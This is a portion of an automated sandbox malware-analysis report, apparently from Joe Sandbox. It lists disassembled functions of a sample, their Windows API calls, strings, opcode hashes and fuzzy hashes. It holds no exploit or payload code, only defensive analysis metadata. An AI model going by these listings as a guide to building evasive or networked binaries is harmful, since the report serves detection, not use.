                                                                                                                  Function 00B44537 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 95windowCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • SendMessageW.USER32(?,00001132,00000000,?), ref: 00B4461F
                                                                                                                  • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00B44634
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2143590187.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2143573675.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B72000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143697585.0000000000B7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143713517.0000000000B84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_ab0000_RubzLi27lr.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: MessageSend
                                                                                                                  • String ID: '
                                                                                                                  • API String ID: 3850602802-1997036262
                                                                                                                  • Opcode ID: 6dd876f1cdcaf64376e22f216b6d0c44db9b7263ca38709a6f67de2ffbc4f887
                                                                                                                  • Instruction ID: d8291d29058d46b76d9d75d65ba26cf9783d17f2663c9bd151c4d9ae178d903f
                                                                                                                  • Opcode Fuzzy Hash: 6dd876f1cdcaf64376e22f216b6d0c44db9b7263ca38709a6f67de2ffbc4f887
                                                                                                                  • Instruction Fuzzy Hash: 40313874A0121A9FDF14CFA9C981BDABBF5FF19300F1144AAE904AB351D770AA51DF90
                                                                                                                  Function 00AB3923 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 94windowCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 00AF33A2
                                                                                                                    • Part of subcall function 00AB6B57: _wcslen.LIBCMT ref: 00AB6B6A
                                                                                                                  • Shell_NotifyIconW.SHELL32(00000001,?), ref: 00AB3A04
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2143590187.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2143573675.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B72000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143697585.0000000000B7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143713517.0000000000B84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_ab0000_RubzLi27lr.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: IconLoadNotifyShell_String_wcslen
                                                                                                                  • String ID: Line:
                                                                                                                  • API String ID: 2289894680-1585850449
                                                                                                                  • Opcode ID: 12d29a1a82005d93e00865a58b730b27187479d2d342cd0d529dfea07bdecfa9
                                                                                                                  • Instruction ID: cc41f990545f023fff72e3498f714661c6e8fbce0a9ee0d50ec9e223c9256c04
                                                                                                                  • Opcode Fuzzy Hash: 12d29a1a82005d93e00865a58b730b27187479d2d342cd0d529dfea07bdecfa9
                                                                                                                  • Instruction Fuzzy Hash: 0931E872409304ABDB25EB24DC45BEBB7ECAF40710F104A1EF59A871A2DF709A49C7C6
                                                                                                                  Function 00B431EF Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 72windowCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 00B4327C
                                                                                                                  • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00B43287
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2143590187.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2143573675.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B72000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143697585.0000000000B7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143713517.0000000000B84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_ab0000_RubzLi27lr.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: MessageSend
                                                                                                                  • String ID: Combobox
                                                                                                                  • API String ID: 3850602802-2096851135
                                                                                                                  • Opcode ID: fb79915fa087629142b73ce400c1ffd95ea04eaea1ce1b0acd0842306c2aacf3
                                                                                                                  • Instruction ID: 0f8036080d84b472fe64b326e3ac1d7eccfb911814d0e232a04ee68c85d1cd09
                                                                                                                  • Opcode Fuzzy Hash: fb79915fa087629142b73ce400c1ffd95ea04eaea1ce1b0acd0842306c2aacf3
                                                                                                                  • Instruction Fuzzy Hash: 6311E2713002087FFF219E54DC80EBB3BEEEB98764F144164F918A7290D6B19E51A760
                                                                                                                  Function 00B43710 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 67COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 00AB600E: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 00AB604C
                                                                                                                    • Part of subcall function 00AB600E: GetStockObject.GDI32(00000011), ref: 00AB6060
                                                                                                                    • Part of subcall function 00AB600E: SendMessageW.USER32(00000000,00000030,00000000), ref: 00AB606A
                                                                                                                  • GetWindowRect.USER32(00000000,?), ref: 00B4377A
                                                                                                                  • GetSysColor.USER32(00000012), ref: 00B43794
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2143590187.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2143573675.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B72000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143697585.0000000000B7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143713517.0000000000B84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_ab0000_RubzLi27lr.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Window$ColorCreateMessageObjectRectSendStock
                                                                                                                  • String ID: static
                                                                                                                  • API String ID: 1983116058-2160076837
                                                                                                                  • Opcode ID: c44cbf817315010ed461090e63f0f0c4b2c8aa1ef19e70e8b4e392c5d78ba5f7
                                                                                                                  • Instruction ID: 0f5b97286a90d10f88f6c3712792d6d52e61a3861c5c8df3b256eb574e34529b
                                                                                                                  • Opcode Fuzzy Hash: c44cbf817315010ed461090e63f0f0c4b2c8aa1ef19e70e8b4e392c5d78ba5f7
                                                                                                                  • Instruction Fuzzy Hash: C21129B2610209AFDB00DFA8CC46EEA7BF8FB09714F044955F995E3250DB35E9519B50
                                                                                                                  Function 00B2CD1E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 66networkCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 00B2CD7D
                                                                                                                  • InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 00B2CDA6
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2143590187.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2143573675.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B72000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143697585.0000000000B7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143713517.0000000000B84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_ab0000_RubzLi27lr.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Internet$OpenOption
                                                                                                                  • String ID: <local>
                                                                                                                  • API String ID: 942729171-4266983199
                                                                                                                  • Opcode ID: 436e562d381e9add0e9861e48c6b92762e27d663a530c8915a5d565a1dd896dc
                                                                                                                  • Instruction ID: b061552b6efd2a1c07549f74c57f38c00a8bdb5cbe9b9ceb2b88fc6865910f12
                                                                                                                  • Opcode Fuzzy Hash: 436e562d381e9add0e9861e48c6b92762e27d663a530c8915a5d565a1dd896dc
                                                                                                                  • Instruction Fuzzy Hash: 081106752016317AD7344B669C84EEBBEECEF127E4F1042B6B11D83090D7749944D6F0
                                                                                                                  Function 00B43429 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 64windowCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • GetWindowTextLengthW.USER32(00000000), ref: 00B434AB
                                                                                                                  • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 00B434BA
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2143590187.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2143573675.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B72000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143697585.0000000000B7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143713517.0000000000B84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_ab0000_RubzLi27lr.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: LengthMessageSendTextWindow
                                                                                                                  • String ID: edit
                                                                                                                  • API String ID: 2978978980-2167791130
                                                                                                                  • Opcode ID: aa1a8dffd961561abfa71ac4b60fdb963a688d6a0ec92cf18d6f39c6e417a744
                                                                                                                  • Instruction ID: b81ae8d42a3535dd417ee4b87cc2e1cc53ab7f23e48dc0f5c72edc6b7173ada1
                                                                                                                  • Opcode Fuzzy Hash: aa1a8dffd961561abfa71ac4b60fdb963a688d6a0ec92cf18d6f39c6e417a744
                                                                                                                  • Instruction Fuzzy Hash: E011C171100108AFEB124E68DC80AFB3BEAEF15B74F544364F965932E0C735DE91A750
                                                                                                                  Function 00B16C86 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 56COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 00AB9CB3: _wcslen.LIBCMT ref: 00AB9CBD
                                                                                                                  • CharUpperBuffW.USER32(?,?,?), ref: 00B16CB6
                                                                                                                  • _wcslen.LIBCMT ref: 00B16CC2
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2143590187.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2143573675.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B72000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143697585.0000000000B7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143713517.0000000000B84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_ab0000_RubzLi27lr.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: _wcslen$BuffCharUpper
                                                                                                                  • String ID: STOP
                                                                                                                  • API String ID: 1256254125-2411985666
                                                                                                                  • Opcode ID: 04e19882638269d0830f27aac68f392eb34524e59a68eeb5227ae27a3ac277ff
                                                                                                                  • Instruction ID: 31eabc8ff097d3257ad659fe235e017ace91d2353c2aa244ae43aa66b824cd0d
                                                                                                                  • Opcode Fuzzy Hash: 04e19882638269d0830f27aac68f392eb34524e59a68eeb5227ae27a3ac277ff
                                                                                                                  • Instruction Fuzzy Hash: 0001C432A0052A8BCB209FBDDD809FF77E9EA6171079005B4E86297191EB31D980C690
                                                                                                                  Function 00B11CDE Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 52windowCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 00AB9CB3: _wcslen.LIBCMT ref: 00AB9CBD
                                                                                                                    • Part of subcall function 00B13CA7: GetClassNameW.USER32(?,?,000000FF), ref: 00B13CCA
                                                                                                                  • SendMessageW.USER32(?,000001A2,000000FF,?), ref: 00B11D4C
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2143590187.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2143573675.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B72000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143697585.0000000000B7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143713517.0000000000B84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_ab0000_RubzLi27lr.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: ClassMessageNameSend_wcslen
                                                                                                                  • String ID: ComboBox$ListBox
                                                                                                                  • API String ID: 624084870-1403004172
                                                                                                                  • Opcode ID: 3485fffd2b14e05e0c63a80e87bba586f790bf09c60a80f7d777aa44300d0cfb
                                                                                                                  • Instruction ID: 5445caa9529c10ba72d11726f5fac9fcb0a1d5a35e8f5d3122d91802e27f4e63
                                                                                                                  • Opcode Fuzzy Hash: 3485fffd2b14e05e0c63a80e87bba586f790bf09c60a80f7d777aa44300d0cfb
                                                                                                                  • Instruction Fuzzy Hash: 5B012431601218AB8B18EFA8DD91CFF77E8FB02350B500A69F932673D2EA315948C660
                                                                                                                  Function 00B11BD8 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 50windowCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 00AB9CB3: _wcslen.LIBCMT ref: 00AB9CBD
                                                                                                                    • Part of subcall function 00B13CA7: GetClassNameW.USER32(?,?,000000FF), ref: 00B13CCA
                                                                                                                  • SendMessageW.USER32(?,00000180,00000000,?), ref: 00B11C46
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2143590187.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2143573675.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B72000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143697585.0000000000B7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143713517.0000000000B84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_ab0000_RubzLi27lr.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: ClassMessageNameSend_wcslen
                                                                                                                  • String ID: ComboBox$ListBox
                                                                                                                  • API String ID: 624084870-1403004172
                                                                                                                  • Opcode ID: 0e45551f47c989a75d61aef1763eb9e380f98ed5807913afe6a37bc25a479c7b
                                                                                                                  • Instruction ID: e32859c049ca5a808ed68d35042d5e04ac9a0f0093d09b9767d7737d79416acd
                                                                                                                  • Opcode Fuzzy Hash: 0e45551f47c989a75d61aef1763eb9e380f98ed5807913afe6a37bc25a479c7b
                                                                                                                  • Instruction Fuzzy Hash: 1301F7757811086BCB14EB94CA919FF77ECDB12340F500459AA1667282EA209F4886F1
                                                                                                                  Function 00B11C5C Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 49windowCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 00AB9CB3: _wcslen.LIBCMT ref: 00AB9CBD
                                                                                                                    • Part of subcall function 00B13CA7: GetClassNameW.USER32(?,?,000000FF), ref: 00B13CCA
                                                                                                                  • SendMessageW.USER32(?,00000182,?,00000000), ref: 00B11CC8
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2143590187.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2143573675.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B72000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143697585.0000000000B7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143713517.0000000000B84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_ab0000_RubzLi27lr.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: ClassMessageNameSend_wcslen
                                                                                                                  • String ID: ComboBox$ListBox
                                                                                                                  • API String ID: 624084870-1403004172
                                                                                                                  • Opcode ID: 2c0b5ea7b4a1944e1c0e188e8a8ebacd7cf665f468f2d010efd2c514fef3c9f3
                                                                                                                  • Instruction ID: 7efab81e72e553f328a86aeaa324db3de703df6fb06d11bba14e288f642cb848
                                                                                                                  • Opcode Fuzzy Hash: 2c0b5ea7b4a1944e1c0e188e8a8ebacd7cf665f468f2d010efd2c514fef3c9f3
                                                                                                                  • Instruction Fuzzy Hash: 0F01D6756812186BCF14EBA4CB41AFF77ECDB12740F940455BA06B7282FA619F48C6F2
                                                                                                                  Function 00B11D68 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 46windowCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 00AB9CB3: _wcslen.LIBCMT ref: 00AB9CBD
                                                                                                                    • Part of subcall function 00B13CA7: GetClassNameW.USER32(?,?,000000FF), ref: 00B13CCA
                                                                                                                  • SendMessageW.USER32(?,0000018B,00000000,00000000), ref: 00B11DD3
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2143590187.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2143573675.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B72000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143697585.0000000000B7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143713517.0000000000B84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_ab0000_RubzLi27lr.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: ClassMessageNameSend_wcslen
                                                                                                                  • String ID: ComboBox$ListBox
                                                                                                                  • API String ID: 624084870-1403004172
                                                                                                                  • Opcode ID: 8925d14aea0934319ef951de495757b031d284d599a7c8bf0f54b7622717b554
                                                                                                                  • Instruction ID: c0687419ab742f26d10cdf310d85f1fa692f492cdedddacfd3f90085d58f9d96
                                                                                                                  • Opcode Fuzzy Hash: 8925d14aea0934319ef951de495757b031d284d599a7c8bf0f54b7622717b554
                                                                                                                  • Instruction Fuzzy Hash: C3F0F971A4121867CB14E7A4DD91BFF77FCEB02740F440D55B922632C2EA605A088260
                                                                                                                  Function 00B3747E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 36COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2143590187.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2143573675.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B72000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143697585.0000000000B7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143713517.0000000000B84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_ab0000_RubzLi27lr.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: _wcslen
                                                                                                                  • String ID: 3, 3, 16, 1
                                                                                                                  • API String ID: 176396367-3042988571
                                                                                                                  • Opcode ID: cc05851debe58349b4182dddb791e31f0a6c1b0240d2cfd4ad72ff7ee546f915
                                                                                                                  • Instruction ID: c4614b946a2fd36e784673893305c67727a17569a41a6a3d01665281a5de132c
                                                                                                                  • Opcode Fuzzy Hash: cc05851debe58349b4182dddb791e31f0a6c1b0240d2cfd4ad72ff7ee546f915
                                                                                                                  • Instruction Fuzzy Hash: 3BE02B42254320219231137A9DC197F76C9CFCD750B20186BF996C2366EEA49D9293A0
                                                                                                                  Function 00B10B15 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 28windowCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 00B10B23
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2143590187.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2143573675.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B72000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143697585.0000000000B7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143713517.0000000000B84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_ab0000_RubzLi27lr.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Message
                                                                                                                  • String ID: AutoIt$Error allocating memory.
                                                                                                                  • API String ID: 2030045667-4017498283
                                                                                                                  • Opcode ID: e6bfddf477290c0366f663c221e0076f13738b747b5ef676dc644fdc7f112213
                                                                                                                  • Instruction ID: 81de42c8e31724a928318eec093eb6666441f77fd1011a65c1ad458a043b2385
                                                                                                                  • Opcode Fuzzy Hash: e6bfddf477290c0366f663c221e0076f13738b747b5ef676dc644fdc7f112213
                                                                                                                  • Instruction Fuzzy Hash: 14E0D8322893183BD25037947D03FC97FC9CF05F10F10446AF758555D38EE1259016E9
                                                                                                                  Function 00AD0D42 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 22COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 00ACF7C9: InitializeCriticalSectionAndSpinCount.KERNEL32(?,00000000,?,00AD0D71,?,?,?,00AB100A), ref: 00ACF7CE
                                                                                                                  • IsDebuggerPresent.KERNEL32(?,?,?,00AB100A), ref: 00AD0D75
                                                                                                                  • OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,00AB100A), ref: 00AD0D84
                                                                                                                  Strings
                                                                                                                  • ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 00AD0D7F
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2143590187.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2143573675.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B72000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143697585.0000000000B7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143713517.0000000000B84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_ab0000_RubzLi27lr.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: CountCriticalDebugDebuggerInitializeOutputPresentSectionSpinString
                                                                                                                  • String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
                                                                                                                  • API String ID: 55579361-631824599
                                                                                                                  • Opcode ID: a7bef0b1a009214ab537dcd0a3aa1cfb89eac17ffd6132474019dd144e222300
                                                                                                                  • Instruction ID: 7d70f7a2b10687ba39396f3523113ada6237c2357c9751f1e08b87fd49c06667
                                                                                                                  • Opcode Fuzzy Hash: a7bef0b1a009214ab537dcd0a3aa1cfb89eac17ffd6132474019dd144e222300
                                                                                                                  • Instruction Fuzzy Hash: 8AE06D742003118BD3609FBCE504B927BE5BB04B41F00496EE483C7762EBF0E544CBA1
                                                                                                                  Function 00B0D21C Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 17timeCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2143590187.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2143573675.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B72000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143697585.0000000000B7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143713517.0000000000B84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_ab0000_RubzLi27lr.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: LocalTime
